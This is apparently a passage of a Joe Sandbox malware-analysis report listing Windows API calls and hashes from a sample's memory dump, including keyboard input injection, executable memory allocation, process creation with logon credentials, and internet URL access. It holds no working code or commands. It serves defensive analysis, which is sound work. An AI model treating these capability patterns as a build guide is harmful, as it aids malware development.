                                                                                                                                                                  • Instruction ID: 4e3db93711654491eacd0451581d8d5a596a0977ef309faa4a2515e1cd1d14ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 11e7a2744e762f7fe69d9072f860d1e052b9c3dc42ff66bc03f302e1fc0a372b
                                                                                                                                                                  • Instruction Fuzzy Hash: 95D0A734920323DFDB216F62F80D61236D4AB09300B008459F69DD1155D7F0C494CA10
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,001FE69C,74DF0AE0,001FE5AC,0027DC28,?,?), ref: 001FE6B4
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 001FE6C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-192647395
                                                                                                                                                                  • Opcode ID: b358ecbbf878cc7581710a6de7a6eddb10590eaaa7519ed5116b463aabb5bc47
                                                                                                                                                                  • Instruction ID: d89f822174db2b14f38213d731fcfec04bd5c113a2500b5047681b932587db47
                                                                                                                                                                  • Opcode Fuzzy Hash: b358ecbbf878cc7581710a6de7a6eddb10590eaaa7519ed5116b463aabb5bc47
                                                                                                                                                                  • Instruction Fuzzy Hash: A9D0A734D1071EDFDB205F35F84C61237D8AB25312F009469E599D1170D7F0D4908650
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,001FE6D9,?,001FE55B,0027DC28,?,?), ref: 001FE6F1
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,IsWow64Process,?,?), ref: 001FE703
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-3024904723
                                                                                                                                                                  • Opcode ID: 3e5914ef74ed588ad9e0b42e50fc038f0f720a3a2c8696accab3aceb19eaae06
                                                                                                                                                                  • Instruction ID: 9c19581de75b6b8390df65710b1cc0bdb392838d1b25834bc374ac41d798e936
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5914ef74ed588ad9e0b42e50fc038f0f720a3a2c8696accab3aceb19eaae06
                                                                                                                                                                  • Instruction Fuzzy Hash: E3D0A738910316DFDB207F21F88C6133FD4BF06300B008559E6DDD2160D7F0D4808650
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0023EBAF,?,0023EAAC), ref: 0023EBC7
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0023EBAF,?,0023EAAC), ref: 0023EBD9
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                  • API String ID: 1029625771-1816364905
                                                                                                                                                                  • Opcode ID: f325f045d8f448c4dcf554ba644c7ead1892aaedd214c303d22c1ea3a7bda731
                                                                                                                                                                  • Instruction ID: 4bdc917d61f81fe19d1510d1c5f3c15748629b1c74b304b43a0acd444684cebc
                                                                                                                                                                  • Opcode Fuzzy Hash: f325f045d8f448c4dcf554ba644c7ead1892aaedd214c303d22c1ea3a7bda731
                                                                                                                                                                  • Instruction Fuzzy Hash: ECD0A7749243139FDF306F31F84CA01B6D4BB05708F11C469F4DAD1190DBF0D8948650
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,0022135F,?,00221440), ref: 00221389
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,RegisterTypeLibForUser,?,00221440), ref: 0022139B
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                  • API String ID: 1029625771-1071820185
                                                                                                                                                                  • Opcode ID: f7020807581b13c7e24e2cb65b5db7fe08812afa1baa15493079ba78a8e7388e
                                                                                                                                                                  • Instruction ID: c0f03c5737f6d5f47a77c2c3e91c4c776b1f82e4e8ef4d82fcf01deca904bfbb
                                                                                                                                                                  • Opcode Fuzzy Hash: f7020807581b13c7e24e2cb65b5db7fe08812afa1baa15493079ba78a8e7388e
                                                                                                                                                                  • Instruction Fuzzy Hash: 20D0A730D20323AFDB208FA5F80CB4136D4AF15314F048499E899D1590D6F4C8B08710
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00221371,?,00221519), ref: 002213B4
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002213C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                  • API String ID: 1029625771-1587604923
                                                                                                                                                                  • Opcode ID: d619d0187f0c6e1183f4d53630c4d4a3676e882fa2364bf3a7b111f7906e0008
                                                                                                                                                                  • Instruction ID: 00a47b8c88177213d9f32631ebdece58294036e7fbc046f2272fbbaadca557c7
                                                                                                                                                                  • Opcode Fuzzy Hash: d619d0187f0c6e1183f4d53630c4d4a3676e882fa2364bf3a7b111f7906e0008
                                                                                                                                                                  • Instruction Fuzzy Hash: 62D0A730920323AFDB208F65F80CA4136E9AB55304F0084A9E459D1560DAF0C8E48710
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00243AC2,?,00243CF7), ref: 00243ADA
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,RegDeleteKeyExW), ref: 00243AEC
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                  • API String ID: 1029625771-4033151799
                                                                                                                                                                  • Opcode ID: 2c75b9a59997aaf7f04b1cce6891190f6d6e158540d2aeef6b06204e67eedc4f
                                                                                                                                                                  • Instruction ID: 98b6dbb7cf0aa377eb6a30d340c01298d081fff68804a195ac43a113685e5367
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c75b9a59997aaf7f04b1cce6891190f6d6e158540d2aeef6b06204e67eedc4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 78D0A7719603278FDB309F61F80DA4177D8AB17304B008469E4DAD1150EFF0C4908A14
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00236AA6), ref: 001EAB2D
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 001EAB49
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 820872866-0
                                                                                                                                                                  • Opcode ID: df8af9109572a46ce8c40b9a4363f797c868a6b8359a6ccbae3e3a1c1339e95c
                                                                                                                                                                  • Instruction ID: 19e6d9113857e7b943ef94e85f43270d8c4b0071a290c35d6121762599aeb213
                                                                                                                                                                  • Opcode Fuzzy Hash: df8af9109572a46ce8c40b9a4363f797c868a6b8359a6ccbae3e3a1c1339e95c
                                                                                                                                                                  • Instruction Fuzzy Hash: AAA1F570B0094ADBDB14DF66E9856BDB7B5FF44300FA5416AEC56C3290EB30A8B1C786
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00240D85
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00240DC8
                                                                                                                                                                    • Part of subcall function 00240458: CharLowerBuffW.USER32(?,?,?,?), ref: 00240478
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00240FB2
                                                                                                                                                                  • _memmove.LIBCMT ref: 00240FC2
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                                                  • Opcode ID: 92f4743ee6b8302d59ff431c85e597b6edeaa7b22bd61f7fd529fb50388bbc9a
                                                                                                                                                                  • Instruction ID: 0eae24094076e6405174312de5ba450f8759b8916c9693ff541372d078c1d847
                                                                                                                                                                  • Opcode Fuzzy Hash: 92f4743ee6b8302d59ff431c85e597b6edeaa7b22bd61f7fd529fb50388bbc9a
                                                                                                                                                                  • Instruction Fuzzy Hash: E0B18C716143018FC718DF28C48096ABBE4EF99714F14886EF9899B362DB71ED96CF81
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0023AF56
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023AF61
                                                                                                                                                                    • Part of subcall function 00221050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 002210B8
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023AF6C
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B23F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                                                  • Opcode ID: fb699dd9425aeeff520c5bc02cff19ad4d853987d77b09bdd93f59d15afaaa28
                                                                                                                                                                  • Instruction ID: 4c8935c9bd8215c9317e6abbf139b6fe779118fd4d0412f5dd8fb441558a36df
                                                                                                                                                                  • Opcode Fuzzy Hash: fb699dd9425aeeff520c5bc02cff19ad4d853987d77b09bdd93f59d15afaaa28
                                                                                                                                                                  • Instruction Fuzzy Hash: 4EA146756147029FCB11DF15C891B2AB7E4FF98320F048459FA9AAB3A1DB70ED54CB82
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3877424927-0
                                                                                                                                                                  • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                                  • Instruction ID: 1553574e24bd83dcafb298dcde142fedfba9af165a6404351f2a91acbf1e28e5
                                                                                                                                                                  • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                                                                  • Instruction Fuzzy Hash: 3951C7B0A20306DBDB24AF69898066E77B5AF40320F34C769FA65962D3D7709D719B40
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024C354
                                                                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 0024C384
                                                                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0024C3EA
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                  • Opcode ID: 41b80a0b953b43676da4e52b64ce5e60686694b02ddf503404ab9f35502b8b51
                                                                                                                                                                  • Instruction ID: 7df22877e6dd07b5516c0c2cd6f261ebab25b1727aae6556d5122294c36e1b70
                                                                                                                                                                  • Opcode Fuzzy Hash: 41b80a0b953b43676da4e52b64ce5e60686694b02ddf503404ab9f35502b8b51
                                                                                                                                                                  • Instruction Fuzzy Hash: BC51AE31A11209EFCF28DF68D984AAE7BB6FF45360F208159F9159B290D770ED51CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0021D258
                                                                                                                                                                  • __itow.LIBCMT ref: 0021D292
                                                                                                                                                                    • Part of subcall function 0021D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0021D549
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0021D2FB
                                                                                                                                                                  • __itow.LIBCMT ref: 0021D350
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0024B3E1
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024D617
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0024D68D
                                                                                                                                                                  • PtInRect.USER32(?,?,0024EB2C), ref: 0024D69D
                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 0024D70E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002244EE
                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 0022450A
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0022456A
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002245C8
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00214DE8
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00214E16
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00214E44
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00214E7A
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00247AB6
                                                                                                                                                                    • Part of subcall function 002269C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002269E3
                                                                                                                                                                    • Part of subcall function 002269C9: GetCurrentThreadId.KERNEL32 ref: 002269EA
                                                                                                                                                                    • Part of subcall function 002269C9: AttachThreadInput.USER32(00000000,?,00228127), ref: 002269F1
                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00247AC7
                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00247B00
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00247B06
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002349B7
                                                                                                                                                                    • Part of subcall function 00234A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00234A60
                                                                                                                                                                    • Part of subcall function 00234A41: InternetCloseHandle.WININET(00000000), ref: 00234AFD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                                                  • Opcode ID: 58583cc08cfd85834252e0a14f271077efd761c4c891eb23324e733acfa562e9
                                                                                                                                                                  • Instruction ID: 1530ed21b56815cb26697a43a50287ba5688530d3377c2859912a7db6ec8b6a6
                                                                                                                                                                  • Opcode Fuzzy Hash: 58583cc08cfd85834252e0a14f271077efd761c4c891eb23324e733acfa562e9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21D4B1260605BFDB12AF609C15FBBB7A9FF48701F10401AFA0596650EBB1E820AB94
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0021BCD9
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0021BCE0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 0021BCFA
                                                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0021BD29
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2621361867-0
                                                                                                                                                                  • Opcode ID: 75ee18440eab24e958a52af4687858c2645f6d86b9c3efcd08f8097db1367d8a
                                                                                                                                                                  • Instruction ID: 93b1560a5fa6d9125102d253bedb4e5556c9f08ed0f9d2857db2e41d229a11c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 75ee18440eab24e958a52af4687858c2645f6d86b9c3efcd08f8097db1367d8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C218E7251020EAFCF029FA8ED49BDE7BF9EF15304F008015FA00A6160C7B68DA1DBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002488A3
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002488BD
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002488CB
                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002488D9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                                                  • Opcode ID: 2afa846bdd3f89791727bafb04e07e8d10bebfc44d7a255e166ab48d4cb9816c
                                                                                                                                                                  • Instruction ID: 44b002ae1651116b7caa4e5da247b558c24521c937fd656324524e24a4af3999
                                                                                                                                                                  • Opcode Fuzzy Hash: 2afa846bdd3f89791727bafb04e07e8d10bebfc44d7a255e166ab48d4cb9816c
                                                                                                                                                                  • Instruction Fuzzy Hash: 33117231725518AFDB18AB25DC05FAE7BA9AF95320F148115F916C72A1CBB4AC108B90
                                                                                                                                                                  APIs
                                                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0023906D
                                                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0023907F
                                                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 0023908C
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 002390A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                                                  • Opcode ID: 831d6747248948c358eaf0be2dd0a5194eaba8e568fe4fb7217fddf6045f2e95
                                                                                                                                                                  • Instruction ID: 3ec30d3a254380a90bf593e17ad466c8eb01bbe5ebaaf836c5e500a4e1075afb
                                                                                                                                                                  • Opcode Fuzzy Hash: 831d6747248948c358eaf0be2dd0a5194eaba8e568fe4fb7217fddf6045f2e95
                                                                                                                                                                  • Instruction Fuzzy Hash: CE214271A001289FC7159F69DC85A9ABBFCEF49710F00816AF849D7290D7B49A45CF91
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?), ref: 00222CB9
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrcpyW.KERNEL32(00000000,?,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00222CDF
                                                                                                                                                                    • Part of subcall function 00222CAA: lstrcmpiW.KERNEL32(00000000,?,002218FD,?,?,?,002226BC,00000000,000000EF,00000119,?,?), ref: 00222D10
                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00221916
                                                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 0022193C
                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,002226BC,00000000,000000EF,00000119,?,?,00000000), ref: 00221970
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                  • String ID: cdecl
                                                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                                                  • Opcode ID: d973f2b043921ce4c156749366af12e9a925325d3215c3f29c049959870ba7cb
                                                                                                                                                                  • Instruction ID: 391f82ad01897e6032ea899d4f2ad98abfd93d8c6431b345884497679c69bda2
                                                                                                                                                                  • Opcode Fuzzy Hash: d973f2b043921ce4c156749366af12e9a925325d3215c3f29c049959870ba7cb
                                                                                                                                                                  • Instruction Fuzzy Hash: F511D636210315BFDB259F74E855D7A77B4FF45350B40802AF806CB254EB71987187A1
                                                                                                                                                                  APIs
                                                                                                                                                                  • _free.LIBCMT ref: 00213D65
                                                                                                                                                                    • Part of subcall function 002045EC: __FF_MSGBANNER.LIBCMT ref: 00204603
                                                                                                                                                                    • Part of subcall function 002045EC: __NMSG_WRITE.LIBCMT ref: 0020460A
                                                                                                                                                                    • Part of subcall function 002045EC: RtlAllocateHeap.NTDLL(00D80000,00000000,00000001), ref: 0020462F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002213EE
                                                                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00221409
                                                                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0022141F
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00221474
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0021C285
